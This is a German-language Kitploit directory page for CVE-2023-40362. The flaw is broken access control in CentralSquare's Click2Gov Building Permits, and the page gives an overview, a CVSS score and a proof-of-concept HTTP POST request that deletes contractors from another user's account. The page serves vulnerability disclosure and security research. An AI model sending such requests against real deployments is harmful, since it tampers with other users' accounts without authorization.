Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-40362 — CVE-2023-40362 Schwachstellen-Details und Proof of Concept | Kitploit
Tools/GitHubGitHub/ally-petitt/cve-2023-40362
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubally-petitt/cve-2023-40362

CVE-2023-40362

CVE-2023-40362 Schwachstellen-Details und Proof of Concept

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-40362

CVE-2023-40362 Details zur Schwachstelle und Proof-of-Concept.

Übersicht

Eine Schwachstelle in der Zugriffskontrolle in Click2Gov BP unter der URI /Click2GovBP/mastercontractorlist.html ermöglicht es authentifizierten Benutzern, die Auftragnehmer von den Konten anderer Benutzer zu löschen – mit der Benutzer-ID des Opfers und den Informationen des zu löschenden Auftragnehmers.

Dies wird dadurch verursacht, dass die Webanwendung nicht prüft, ob der Benutzer berechtigt ist, den Auftragnehmer vom Konto zu löschen, dessen Benutzer-ID angegeben wurde.

Anbieter: CentralSquare

Gemeldet von: Ally Petitt

Entdeckt: 13. Juni 2023

Betroffene Produkte: Click2Gov Building Permits (BP)

Betroffene Versionen: Vor Oktober 2023

CVSS v3: 5.4 - Mittel (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)

Proof of Concept (PoC)

Die unten gezeigte HTTP-POST-Anfrage kann gesendet werden, um einen Auftragnehmer vom Konto eines Opfers zu löschen. Das CSRF-Token muss dafür gültig sein.

root@kitploit:~
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>
Tool herunterladen